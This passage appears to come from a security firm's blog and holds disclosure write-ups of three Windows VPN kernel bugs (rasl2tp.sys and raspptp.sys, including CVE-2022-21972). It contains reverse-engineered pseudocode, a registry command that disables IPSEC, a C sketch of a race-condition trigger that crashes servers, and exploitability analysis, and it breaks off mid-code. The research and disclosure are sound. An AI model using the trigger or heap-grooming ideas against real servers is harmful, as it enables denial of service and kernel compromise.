L2TP is a relatively uncommonly used protocol and sits behind an IPSEC authenticated tunnel by default, making the chances of seeing this bug in the wild extremely low. Despite the low likelihood of exploitation, analysis of this bug demonstrates interesting adverse effects of code which was designed to actually mitigate security risk.

L2TP and IPSEC

The default way to interact with an L2TP VPN on Windows Server is by first establishing an IPSEC tunnel to encrypt the traffic. For the purposes of providing a minimalistic proof of concept, I tested against Windows Server with the IPSEC tunnelling layer disabled, interacting directly with the L2TP driver. Please note however, it is still possible to trigger this bug over an IPSEC tunnelled connection.

For curious readers, disabling IPSEC can be achieved by setting the ProhibitIpSec DWORD registry key with a value of 1 under the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\
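For example, something along these lines does the trick (a restart of the RasMan service, or a reboot, may be needed for the change to take effect):

reg add "HKLM\SYSTEM\CurrentControlSet\Services\RasMan\Parameters" /v ProhibitIpSec /t REG_DWORD /d 1 /f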

This will disable IPSEC tunnelling and allow L2TP to be interacted with directly over UDP. Not to discourage a full IPSEC + L2TP solution, but it does make testing the L2TP driver a great deal easier!

Vulnerability Details

The bug in question is a reference increment bug located in the rasl2tp.sys L2TP VPN protocol driver, and relates to how tunnel context structures are reused. Each established tunnel for a connection is allocated a context structure, and a unique tunnel is considered to be the pairing of both a unique tunnel ID and UDP + IP address.

When a client initiates an L2TP StartControlConnectionRequest for a tunnel ID that they have previously used on a source IP and port that the server has already seen, the rasl2tp driver will attempt to reuse a previously allocated structure as long as it is not in an unusable state or already freed. This functionality is handled by the SetupTunnel function when a StartControlConnectionRequest is made with no tunnel or session ID specified in the L2TP Header, and an assigned tunnel ID matching one that has already been used.

Pseudo code for the vulnerable section is as follows:

if ( !lpL2tpHeaderHasTunnelID )
{
   // Tunnel Lookup function uses UDP address information as well as TunnelID to match a previous Tunnel Context structure
   NewTunnel = TunnelCbFromIpAddressAndAssignedTunnelId(lpAdapterCtx, lpSockAddr, lpTunnelId);
   if ( NewTunnel ) // if a match is found a pointer is returned else the return is NULL
   {
      if...
      ReferenceTunnel(NewTunnel, 1); // This is the vulnerable reference count
      KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
      return NewTunnel;
   }
}

The issue is that the reference count does not have an appropriate dereference anywhere in the code. This means that it is possible for a malicious client to continually send StartControlConnectionRequests to increment the value indefinitely.

This creates two separate vulnerable conditions. Firstly, because the reference count can be far greater than it should be, it is possible for an attacker to abuse the issue to exhaust the memory resources of the server by spoofing numerous IP address and tunnel ID combinations and sending several StartControlConnectionRequests. This would keep the structures alive indefinitely until the server’s resources are exhausted, causing a denial of service. This process can be amplified across many nodes to accelerate the process of consuming server resources and is only limited by the bandwidth capacity of the server. In reality, this process may also be limited by other factors applied to network traffic before the L2TP protocol is handled.

The second vulnerable condition is due to logic in the DereferenceTunnel function responsible for removing tunnel references and initiating the underlying free operation. It is possible to turn this issue into a Use after Free (UaF) vulnerability, which could potentially then be used to achieve Remote Code Execution.

Some pseudo code for the logic that allows this to happen in the DereferenceTunnel function is as follows:

__int64 __fastcall DereferenceTunnel(TunnelCtx *TunnelCtx)
{
   ...

   lpAdapterCtx = TunnelCtx->AdapterCtx;
   lpTunnelCtx = TunnelCtx;
   lpAdapterCtx->TunnelCurIRQL = KeAcquireSpinLockRaiseToDpc(&lpAdapterCtx->TunnelLock);
   RefCount = --lpTunnelCtx->TunnelRefCount;
   if ( !RefCount )
   {
      // This code path properly removes the Tunnel Context from a global linked list and handles state termination
      ...
   }
   KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
   if ( RefCount > 0 ) // This line is vulnerable to a signed integer overflow
      return (unsigned int)RefCount;
   ...
   lpTunnelCtx->TunnelTag = '0T2L';
   ExFreePoolWithTag(&lpTunnelCtx[-1].TunnelVcListIRQL, 0);
   ...
   return 0i64;
}

The second check of the reference count that would normally cause the function to return uses a signed integer for the reference count variable. This means using the reference increment bug we can cause the reference count value to overflow and become a negative number. This would cause the DereferenceTunnel function to free the target tunnel context structure without removing it from the global linked list.

The global linked list in question is used to store all the active tunnel context structures. When a UDP packet is handled, this global linked list is used to lookup the appropriate tunnel structure. If a freed structure was still present in the list, any UDP packet referencing the freed context structure’s ID would be able to gain access to the freed structure and could be used to further corrupt kernel memory.

Exploitation

Exploitation of this bug outside of just exhausting the memory resources of a target server could take a very long time and I suspect would not realistically be exploitable or viable. Since a reference count can only happen once per UDP packet and each UDP message has to be large enough to contain all prior network stack frames and the required L2TP (and IPSEC) messages, the total required throughput is huge and would almost definitely be detected as a denial of service (DoS) attack long before reaching the required reference count.

Conclusion

This leaves the question of why a developer would allow a reference count to be handled in this way, when it should never need to go below a minimum value of 0.

The main reason for allowing a reference count to become a negative number is to account or check for code that over-decrements references, which with an unsigned counter would typically result in an unsigned overflow. This kind of programming is a way of mitigating the risk posed by the more likely situation where a reference count is over-decremented. However, a direct result is that the opposite situation then becomes much more exploitable, and in this scenario results in a potential for remote code execution (RCE).

Despite this, the mitigation is still generally effective, and the precursors for exploitation of this issue are unlikely to be realistically exploitable. In a way, the intended mitigation works because even though the maximum possible impact is far greater, the likelihood of exploitation is far lower.

Timeline

  • Vulnerability Reported To Microsoft – 20 April 2022
  • Vulnerability Acknowledged – 20 April 2022
  • Patch In Development – 23 June 2022
  • Patch Released – 12 July 2022


CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1)

10 May 2022 at 09:00

CVE-2022-21972 is a Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering the raspptp.sys kernel driver. The vulnerability is a race condition issue and can be reliably triggered through sending crafted input to a vulnerable server. The vulnerability can be used to corrupt memory and could be used to gain kernel Remote Code Execution (RCE) or Local Privilege Escalation (LPE) on a target system.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972

The vulnerable code is present on both server and desktop distributions, however due to configuration differences, only the server deployment is exploitable.

Overview

This vulnerability is based heavily on how socket object life cycles are managed by the raspptp.sys driver. In order to understand the vulnerability, we must first understand some of the basics of how the kernel driver interacts with sockets to implement network functionality.

Sockets In The Windows Kernel – Winsock Kernel (WSK)

WSK is the name of the Windows socket API that can be used by drivers to create and use sockets directly from the kernel. Head over to https://docs.microsoft.com/en-us/windows-hardware/drivers/network/winsock-kernel-overview to see an overview of the system.

The WSK API is usually used through a set of event-driven callback functions. Effectively, once a socket is set up, an application can provide a dispatch table containing a set of function pointers to be called for socket-related events. In order for an application to be able to maintain its own state through these callbacks, a context structure is also provided by the driver to be given to each callback, so that state can be tracked for the connection throughout its life cycle.

raspptp.sys and WSK

Now that we understand the basics of how sockets are interacted with in the kernel, let’s look at how the raspptp.sys driver uses WSK to implement the PPTP protocol.

The PPTP protocol specifies two socket connections; a TCP socket used for managing a VPN connection and a GRE (Generic Routing Encapsulation) socket used for sending and receiving the VPN network data. The TCP socket is the only one we care about for triggering this issue, so let’s break down the life cycle of how raspptp.sys handles these connections with WSK.

  1. A new listening socket is created by the WskOpenSocket function in raspptp.sys.  This function is passed a WSK_CLIENT_LISTEN_DISPATCH dispatch table with the WskConnAcceptEvent function specified as the WskAcceptEvent handler. This is the callback that handles a socket accept event, aka a new incoming connection.
  2. When a new client connects to the server the WskConnAcceptEvent function is called.  This function allocates a new context structure for the new client socket and registers a WSK_CLIENT_CONNECTION_DISPATCH dispatch table with all event callback functions specified. These are WskConnReceiveEvent, WskConnDisconnectEvent and WskConnSendBacklogEvent for receive, disconnect and send events respectively.
  3. Once the accept event is fully resolved, WskAcceptCompletion is called and a callback is triggered (CtlConnectQueryCallback) which completes initialisation of the PPTP Control connection and creates a context structure specifically for tracking the state of the client’s PPTP control connection. This is the main object which we care about for this vulnerability.

The PPTP Control connection context structure is allocated by the CtlAlloc function. Some abbreviated pseudo code for this function is:

PptpCtlCtx *__fastcall CtlAlloc(PptpAdapterContext *AdapterCtx)
{
    PptpAdapterContext *lpPptpAdapterCtx;
    PptpCtlCtx *PptpCtlCtx;
    PptpCtlCtx *lpPptpCtlCtx;
    NDIS_HANDLE lpNDISMiniportHandle;
    PDEVICE_OBJECT v6;
    __int64 v7;
    NDIS_HANDLE lpNDISMiniportHandle_1;
    NDIS_HANDLE lpNDISMiniportHandle_2;
    struct _NDIS_TIMER_CHARACTERISTICS TimerCharacteristics;

    lpPptpAdapterCtx = AdapterCtx;
    PptpCtlCtx = (PptpCtlCtx *)MyMemAlloc(0x290ui64, 'TPTP'); // Actual name of the allocator function in the raspptp.sys code
    lpPptpCtlCtx = PptpCtlCtx;
    if ( PptpCtlCtx )
    {
        memset(PptpCtlCtx, 0, 0x290ui64);
        ReferenceAdapter(lpPptpAdapterCtx);
        lpPptpCtlCtx->AllocTagPTPT = 'TPTP';
        lpPptpCtlCtx->CtlMessageTypeToLength = (unsigned int *)&PptpCtlMessageTypeToSizeArray;
        lpPptpCtlCtx->pPptpAdapterCtx = lpPptpAdapterCtx;
        KeInitializeSpinLock(&lpPptpCtlCtx->CtlSpinLock);
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Blink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Blink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Flink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Flink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Blink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Flink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpNDISMiniportHandle = lpPptpAdapterCtx->MiniportNdisHandle;
        TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpEchoTimeout;
        *(_DWORD *)&TimerCharacteristics.Header.Type = 0x180197;
        TimerCharacteristics.AllocationTag = 'TMTP';
        TimerCharacteristics.FunctionContext = lpPptpCtlCtx;
        if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlEchoTimeoutNdisTimerHandle) )
        {
        ...
        }
        else
        {
            lpNDISMiniportHandle_1 = lpPptpAdapterCtx->MiniportNdisHandle;
            TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
            if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle_1,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
            {
                ...
            }
            else
            {
                lpNDISMiniportHandle_2 = lpPptpAdapterCtx->MiniportNdisHandle;
                TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpStopTimeout;
                if ( !NdisAllocateTimerObject(
                lpNDISMiniportHandle_2,
                &TimerCharacteristics,
                &lpPptpCtlCtx->CtlStopTimeoutNdisTimerHandle) )
                {
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutTriggered, NotificationEvent, 1u);
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutCancled, NotificationEvent, 1u);
                    lpPptpCtlCtx->CtlCtxReferenceCount = 1;// Set reference count to an initial value of one
                    lpPptpCtlCtx->fpCtlCtxFreeFn = (__int64)CtlFree;
                    ExInterlockedInsertTailList(
                    (PLIST_ENTRY)&lpPptpAdapterCtx->PptpWanEndpointsFlink,
                    &lpPptpCtlCtx->CtlPptpWanEndpointsEntry,
                    &lpPptpAdapterCtx->PptpAdapterSpinLock);
                    return lpPptpCtlCtx;
                }
                ...
            }
        }
        ...
    }
    if...
        return 0i64;
}

The important parts of this structure to note are the CtlCtxReferenceCount and CtlWaitTimeoutNdisTimerHandle structure members. This new context structure is stored on the socket context for the new client socket and can then be referenced for all of the events relating to the socket it binds to.

The only fields of the socket context structure that we then care about are the following:

00000008 ContextPtr dq ? ; PptpCtlCtx
00000010 ContextRecvCallback dq ? ; CtlReceiveCallback
00000018 ContextDisconnectCallback dq ? ; CtlDisconnectCallback
00000020 ContextConnectQueryCallback dq ? ; CtlConnectQueryCallback
  • PptpCtlCtx – The PPTP specific context structure for the control connection.
  • CtlReceiveCallback – The PPTP control connection receive callback.
  • CtlDisconnectCallback – The PPTP control connection disconnect callback.
  • CtlConnectQueryCallback – The PPTP control connection query (used to get client information on a new connection being complete) callback.

raspptp.sys Object Life Cycles

The final bit of background information we need to understand before we delve into the vulnerability is the way that raspptp keeps these context structures alive for a given socket. In the case of the PptpCtlCtx structure, both the client socket and the PptpCtlCtx structure have a reference count.

This reference count is intended to be incremented every time a reference to either object is created. These are initially set to 1 and when decremented to 0 the objects are freed by calling a free callback stored within each structure. This obviously only works if the code remembers to increment and decrement the reference counts properly and correctly lock access across multiple threads when handling the respective structures.

Within raspptp.sys, the code that performs the reference increment and de-increment functionality usually looks like this:

// Increment code
_InterlockedIncrement(&Ctx->ReferenceCount);

// Decrement Code
if ( _InterlockedExchangeAdd(&Ctx->ReferenceCount, 0xFFFFFFFF) == 1 )
    ((void (__fastcall *)(CtxType *))Ctx->fpFreeHandler)(Ctx);

As you may have guessed at this point, the vulnerability we’re looking at is indeed due to incorrect handling of these reference counts and their respective locks, so now that we have covered the background stuff let’s jump into the juicy details!

The Vulnerability

The first part of our use after free vulnerability is in the code that handles receiving PPTP control data for a client connection. When new data is received by raspptp.sys, the WSK layer will dispatch a call to the appropriate event callback. raspptp.sys registers a generic callback for all sockets called ReceiveData. This function parses the incoming data structures from WSK and forwards the incoming data on to the client socket context’s own receive data callback. For a PPTP control connection, this callback is the CtlReceiveCallback function.

The section of the ReceiveData function that calls this callback has the following pseudo code. This snippet includes all the locking and reference increments that are used to protect the code against multi-threaded access issues…

_InterlockedIncrement(&ClientCtx->ConnectionContextReferenceCount);
((void (__fastcall *)(PptpCtlCtx *, PptpCtlInputBufferCtx *, _NET_BUFFER_LIST *))ClientCtx->ContextRecvCallback)(
ClientCtx->ContextPtr,
lpCtlBufferCtx,
NdisNetBuffer);

The CtlReceiveCallback function has the following pseudo code:

__int64 __fastcall CtlReceiveCallback(PptpCtlCtx *PptpCtlCtx, PptpCtlInputBufferCtx *PptpBufferCtx, _NET_BUFFER_LIST *InputBufferList)
{
    PptpCtlCtx *lpPptpCtlCx;
    PNET_BUFFER lpInputFirstNetBuffer;
    _NET_BUFFER_LIST *lpInputBufferList;
    ULONG NetBufferLength;
    PVOID NetDataBuffer;

    lpPptpCtlCx = PptpCtlCtx;
    lpInputFirstNetBuffer = InputBufferList->FirstNetBuffer;
    lpInputBufferList = InputBufferList;
    NetBufferLength = lpInputFirstNetBuffer->DataLength;
    NetDataBuffer = NdisGetDataBuffer(lpInputFirstNetBuffer, lpInputFirstNetBuffer->DataLength, 0i64, 1u, 0);
    if ( NetDataBuffer )
        CtlpEngine(lpPptpCtlCx, (uchar *)NetDataBuffer, NetBufferLength);
    ReceiveDataComplete(lpPptpCtlCx->CtlWskClientSocketCtx, lpInputBufferList);
    return 0i64;
}

The CtlpEngine function is the state machine responsible for parsing the incoming PPTP control data. Now there is one very important piece of code that is missing from these two sections and that is any form of reference count increment or locking for the PptpCtlCtx object!

Neither of the callback handlers actually increments the reference count for the PptpCtlCtx or attempts to lock access to signify that it is in use; this is potentially a vulnerability, because if at any point the reference count were to be decremented then the object would be freed! However, if this is so bad, why isn’t every PPTP server just crashing all the time? The answer to this question is that the CtlpEngine function actually uses the reference count correctly.

This is where things get confusing. If the raspptp.sys driver were completely single-threaded, this implementation would be entirely safe, as no part of the receive pipeline for the control connection decrements the object reference count without first performing an increment to account for it. In reality, however, raspptp.sys is not a single-threaded driver. Looking back at the initialization of the PptpCtlCtx object, there is one part of particular interest.

TimerCharacteristics.FunctionContext = PptpCtlCtx;
TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
if ( NdisAllocateTimerObject(
    lpNDISMiniportHandle_1,
    &TimerCharacteristics,
    &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )

Here we can see the allocation of an NDIS timer object. The actual implementation of these timers isn't important; what is important is that these timers dispatch their callbacks on a separate thread from the one on which WSK dispatches the ReceiveData callback. Another interesting point is that both use the PptpCtlCtx structure as their context structure.

So what does this timer callback do and when does it happen? The code that sets the timer is as follows:

NdisSetTimerObject(newClientCtlCtx->CtlWaitTimeoutNdisTimerHandle, (LARGE_INTEGER)-300000000i64, 0, 0i64);// 30 second timeout timer

We can see that a 30 second timer is set, and when the 30 seconds are up the CtlpWaitTimeout callback is called. This timer can be cancelled, but that only happens when a client performs a PPTP control handshake with the server; so, assuming we never send a valid handshake, after 30 seconds the callback will be dispatched.
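
We haven't reproduced the handshake handling here, but the cancellation itself presumably boils down to something like the following sketch (the timer handle field name is taken from the allocation code above; the surrounding logic is an assumption).

// Sketch only: how the StartControlConnectionRequest handling would cancel the
// 30 second wait timer. NdisCancelTimerObject returns TRUE if the timer was
// cancelled before it fired.
if ( !NdisCancelTimerObject(lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
{
    // Too late - the timer has already fired (or is firing) and
    // CtlpWaitTimeout is on its way.
}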

So what does this callback actually do? The CtlpWaitTimeout function handles the timer callback and has the following pseudo code:

LONG __fastcall CtlpWaitTimeout(PVOID Handle, PptpCtlCtx *Context)
{
    PptpCtlCtx *lpCtlTimeoutEvent;

    lpCtlTimeoutEvent = Context;
    CtlpDeathTimeout(Context);
    return KeSetEvent(&lpCtlTimeoutEvent->CtlWaitTimeoutTriggered, 0, 0);
}

As we can see the function mainly serves to call the eerily named CtlpDeathTimeout function, which has the following pseudo code:

void __fastcall CtlpDeathTimeout(PptpCtlCtx *CtlCtx)
{
    PptpCtlCtx *lpCtlCtx;
    __int64 Unkown;
    CHAR *v3;
    char SockAddrString;

    lpCtlCtx = CtlCtx;
    memset(&SockAddrString, 0, 65ui64);
    if...
        CtlSetState(lpCtlCtx, CtlStateUnknown, Unkown, 0);
        CtlCleanup(lpCtlCtx, 0);
}

This is where things get even more interesting. The CtlCleanup function is responsible for starting the process of tearing down the PPTP control connection. This is done in two steps. First, the state of the control connection is set to CtlStateUnknown, which means that the CtlpEngine function will be prevented from processing any further control connection data (kind of). The second step is to push a task that runs the similarly named CtlpCleanup function onto a background worker thread belonging to the raspptp.sys driver.

The end of the CtlpCleanup function contains the following code, which will be very useful for triggering a use after free because it always runs on a different thread to the CtlpEngine function.

result = (unsigned int)_InterlockedExchangeAdd(&lpCtlCtxToCleanup->CtlCtxReferenceCount, 0xFFFFFFFF);
if ( (_DWORD)result == 1 )
    result = ((__int64 (__fastcall *)(PptpCtlCtx *))lpCtlCtxToCleanup->fpCtlCtxFreeFn)(lpCtlCtxToCleanup);

It decrements the reference count on the PptpCtlCtx object and, even better, no part of this timeout pipeline increments the reference count in a way that would prevent the free function from being called!

So, theoretically, all we need to do is find some way of getting the CtlpCleanup and CtlpEngine functions to run at the same time on separate threads and we will be able to cause a use after free!

However, before we celebrate too early, we should take a look at the function that actually frees the PptpCtlCtx structure, because it is yet another callback. The fpCtlCtxFreeFn property is a callback function pointer to the CtlFree function. This function does a decent amount of teardown as well, but the bits we care about are the following lines:

WskCloseSocketContextAndFreeSocket(CtlWskContext);
lpCtlCtxToFree->CtlWskClientSocketCtx = 0i64;
...
ExFreePoolWithTag(lpCtlCtxToFree, 0);

Now, there is an added complication in this code that is going to make things a little more difficult. The call to WskCloseSocketContextAndFreeSocket actually closes the client socket before freeing the PptpCtlCtx structure. This means that at the point the PptpCtlCtx structure is freed, we will no longer be able to send new data to the socket and trigger any more calls into CtlpEngine. However, this doesn't mean that we can't trigger the vulnerability: if data is already being processed by CtlpEngine when the socket is closed, we simply need to hope the thread stays in the function long enough for the free to occur in CtlFree and boom – we have a UAF.

Now that we have a good old fashioned kernel race condition, let’s take a look at how we can try to trigger it!

The Race Condition

Like any good race condition, this one contains a lot of moving parts and added complications which make triggering it a non-trivial task, but it's still possible! Let's take a look at what needs to happen.

  1. The 30 second timeout is triggered and eventually runs CtlCleanup, pushing a CtlpCleanup task onto a background worker thread queue.
  2. Background worker thread wakes up and starts processing the CtlpCleanup task from its task queue.
  3. CtlpEngine starts or is currently processing data on a WSK dispatch thread when the CtlpCleanup function frees the underlying PptpCtlCtx structure from the worker thread!
  4. Bad things happen…

Triggering the Race Condition

The main questions to consider for this race condition are: what limits are there on the data we can send to the server in order to spend as much time as possible in the CtlpEngine parsing loop, and can we do this without cancelling the timeout?

Thankfully, as previously mentioned, the only way to cancel the timeout is to perform a PPTP control connection handshake, which technically means we can have the CtlpEngine function process any other part of the control connection, as long as we don't start the handshake. However, the state machine within CtlpEngine needs the handshake to have taken place before it will enable any other part of the control connection!

There is one part of the CtlpEngine state machine that can still be partially (and validly) hit before the handshake has taken place, without triggering an error: the EchoRequest control message type. We can't actually enter the proper handling of this message type before the handshake, but we can use it to iterate through all of the sent data in the parsing loop without triggering a parsing error. This effectively gives us a way of spinning inside the CtlpEngine function without cancelling the timeout, which is exactly what we want. Even better, this remains true once the CtlStateUnknown state is set by the CtlCleanup function.

Unfortunately, the maximum amount of data we can process in one WSK receive data event callback is limited to the maximum amount of data that can be received in one TCP packet. In theory this is 65,535 bytes, but because Ethernet frames are limited to 1,500 bytes we can only fit ~1,450 bytes of PPTP control messages into a single request (1,500 minus the headers of the lower network layers). This works out at around 90 EchoRequest messages per callback trigger, which is not a lot for a modern CPU to churn through before hopping back out of the CtlpEngine function.
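
For reference, an EchoRequest control message is only 16 bytes on the wire (per RFC 2637), which is where the ~90 messages per packet figure comes from. A sketch of the layout:

#include <stdint.h>

// PPTP Echo-Request control message as defined in RFC 2637 (all fields big endian).
#pragma pack(push, 1)
typedef struct _PPTP_ECHO_REQUEST {
    uint16_t Length;              // total message length: 16 for an Echo-Request
    uint16_t PptpMessageType;     // 1 = control message
    uint32_t MagicCookie;         // always 0x1A2B3C4D
    uint16_t ControlMessageType;  // 5 = Echo-Request
    uint16_t Reserved0;
    uint32_t Identifier;          // echoed back by the server in the Echo-Reply
} PPTP_ECHO_REQUEST;
#pragma pack(pop)

// ~1,450 usable bytes per TCP segment / 16 bytes per message ~= 90 Echo-Requests.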

Another thing to consider is how we know whether the race condition succeeded or failed. Thankfully, the server socket being closed on timeout works in our favour here: attempting to send any more data once the server has closed the socket will cause a socket error on the client. Once the socket is closed we know that the race is finished, but we don't necessarily know whether or not we won it.

With these considerations in place, how do we trigger the vulnerability? It actually becomes a simple proof of concept: we continually send EchoRequest PPTP control frames in 90-frame bursts to a server until the timeout event occurs, and then we hope that we've won the race.
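
A sketch of that loop is below, reusing the PPTP_ECHO_REQUEST layout shown earlier. SendAll() is a hypothetical helper wrapping send() on the already-connected control socket (returning 0 on success and non-zero once the server closes the connection); the full PoC, including the heap and race specifics, is deliberately omitted.

#include <winsock2.h>
#include <stdint.h>

// Sketch: keep CtlpEngine busy by sending bursts of ~90 Echo-Requests until the
// 30 second timeout closes the socket (at which point sending starts to fail).
void SprayEchoRequests(SOCKET ctlSock)
{
    PPTP_ECHO_REQUEST burst[90];

    for (int i = 0; i < 90; i++) {
        burst[i].Length             = htons(16);
        burst[i].PptpMessageType    = htons(1);
        burst[i].MagicCookie        = htonl(0x1A2B3C4D);
        burst[i].ControlMessageType = htons(5);   // Echo-Request
        burst[i].Reserved0          = 0;
        burst[i].Identifier         = htonl((uint32_t)i);
    }

    // When the server times out and closes the socket, SendAll() fails and we
    // know the race window has ended (win or lose).
    while (SendAll(ctlSock, (const char *)burst, sizeof(burst)) == 0) {
        /* keep the parsing loop spinning */
    }
}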

We won't be releasing the PoC code until people have had a chance to patch things up, but when the PoC is successful the target server bug checks with a Blue Screen of Death.

Because the PptpCtlCtx structure is de-initialised, it contains a lot of pointers and properties with invalid values which, if used in different parts of the receive event handling code, will cause crashes in less fun ways, such as plain null pointer dereferences. That is in fact what happened in the Blue Screen of Death just mentioned, although the CtlpEngine function did still process a freed PptpCtlCtx structure.

Can we use this vulnerability for anything more than a simple BSOD?

Exploitation

Due to the state of memory corruption mitigations in the Windows kernel and the difficult nature of this race condition, achieving useful exploitation of the vulnerability is not going to be easy, especially if seeking to obtain Remote Code Execution (RCE). However, this does not mean it is impossible.

Exploitability – The Freed Memory

In order to assess the exploitability of the vulnerability, we need to look at what our freed memory contains and whereabouts it sits in the Windows kernel heap. In WinDbg we can use the !pool command to get some information on the allocated chunk that will be freed in our UAF issue.

ffff828b17e50d20 size: 2a0 previous size: 0 (Allocated) *PTPT

We can see here that the size of the freed memory block is 0x2a0 (672 bytes). This is important, as it puts us in the allocation size range for the variable size kernel heap segment. This heap segment is fairly friendly for use after free exploitation, as the variable size heap maintains a free list of chunks that have been freed, along with their sizes. When a new chunk is allocated this free list is searched, and if a chunk with an exact or greater size match is found it will be used for the new allocation. Since this is the kernel, any other component that makes non-paged pool allocations of this or a similar size could end up using this freed slot as well.

So, what do we need in order to start exploiting this issue? Ideally we want to find some kernel object whose contents we can control and which we can allocate at 0x2a0 bytes in size. This would allow us to create a fake PptpCtlCtx object, which we could then use to control the CtlpEngine state machine code. Finding an exact size match isn't the only way we could groom the heap for a potential exploit, but it would certainly be the most reliable method.

If we can take control of a PptpCtlCtx object, what can we do? One of the most powerful aspects of this vulnerability from an exploit development perspective is the set of callback function pointers located inside the PptpCtlCtx structure. Usually a mitigation such as Control Flow Guard (CFG) or eXtended Flow Guard (XFG) would prevent us from corrupting these callback pointers and pointing them at an arbitrary executable kernel address. However, CFG and XFG are not enabled for the raspptp.sys driver (as of writing this blog), meaning we can point execution at any instruction located in the kernel. This gives us plenty to abuse for exploitation purposes. A caveat is that we are limited in the number of these gadgets we can use in one trigger of the vulnerability, meaning we would likely need to trigger the vulnerability multiple times with different gadgets to achieve a full exploit, at least on a modern Windows kernel.

Exploitability – Threads

Allocating an object to fill our freed slot and taking control of kernel execution through a fake PptpCtlCtx object sounds great, but there is an additional restriction on how we do this: we only have access to CtlpEngine using the freed object for a short window of CPU time. We can't use the same thread that is processing CtlpEngine to allocate objects to fill the empty slot; by the time we could, the thread would already have returned from CtlpEngine, at which point the vulnerability is no longer exploitable.

What this means is that the fake object allocations need to happen on a separate thread, in the hope that we can get one of our fake objects allocated and populated with our chosen contents while the vulnerable kernel thread is still inside CtlpEngine, allowing us to start doing bad things with the state machine. That is a lot to get done in a relatively small CPU window, but it could plausibly be achieved. The issue for any exploit attempting this is going to be reliability, since there is a fairly high chance a failed attempt crashes the target machine, and retrying the exploit would be a slow and easily detectable process.

Exploitability – Local Privilege Escalation vs Remote Code Execution

Exploiting this issue for LPE is much more likely to be successful across the affected Windows kernel versions than exploiting it for RCE. This is largely because an RCE exploit would first need to leak information about the kernel, using either this vulnerability or another one, before any of the potential callback corruption techniques would be viable. There are also far fewer parts of the kernel accessible remotely, meaning that finding a way to spray a fake PptpCtlCtx object into the kernel heap remotely is going to be significantly harder to achieve.

Another reason that LPE is a much more viable exploit route is that a localhost (127.0.0.1) socket allows far more data to be processed by each WSK receive event callback than the Ethernet-frame-capped 1,500 bytes we get remotely. This significantly improves most of the variables involved in achieving successful exploitation!

Conclusion

Wormable kernel remote code execution vulnerabilities are the holy grail of severity in modern operating systems. With great power, however, comes great responsibility: while this vulnerability could be catastrophic in its impact, the skill required to pull off a successful and undetected exploit is not to be underestimated. Memory corruption continues to become a harder and harder art form to master; however, there are certainly those out there with the ability and determination to realise the full potential of this vulnerability. For these reasons, CVE-2022-21972 represents a very real threat to internet-connected, Microsoft-based VPN infrastructure. We recommend that this vulnerability is patched with priority in all environments.

Timeline

  • Vulnerability reported to Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 12 Nov 2021
  • Patch released – 10 May 2022


CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference

22 March 2022 at 09:00

CVE-2022-23253 is a Windows VPN (remote access service) denial of service vulnerability that Nettitude discovered while fuzzing the Windows Server Point-to-Point Tunnelling Protocol (PPTP) driver. The implications of this vulnerability are that it could be used to launch a persistent Denial of Service attack against a target server. The vulnerability requires no authentication to exploit and affects all default configurations of Windows Server VPN.

Nettitude has followed a coordinated disclosure process and reported the vulnerability to Microsoft. As a result the latest versions of MS Windows are now patched and no longer vulnerable to the issue.

Affected Versions of Microsoft Windows Server

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions, check the official disclosure post on MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23253.

Overview

PPTP is a VPN protocol used to multiplex and forward virtual network data between a client and a VPN server. The protocol has two parts: a TCP control connection and a GRE data connection. The TCP control connection is mainly responsible for configuring the buffering and multiplexing of network data between the client and server. In order to talk to the control connection of a PPTP server, we only need to connect to the listening socket and initiate the protocol handshake. After that we are able to start a complete PPTP session with the server.
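
Reaching the control connection really is that simple: the server listens on TCP port 1723, so all that's needed is a plain TCP connect before sending the handshake. A rough Winsock sketch (error handling omitted, illustrative only):

#include <winsock2.h>
#include <ws2tcpip.h>

// Sketch: open a TCP connection to the PPTP control port (1723) of a target server.
SOCKET ConnectPptpControl(const char *serverIp)
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
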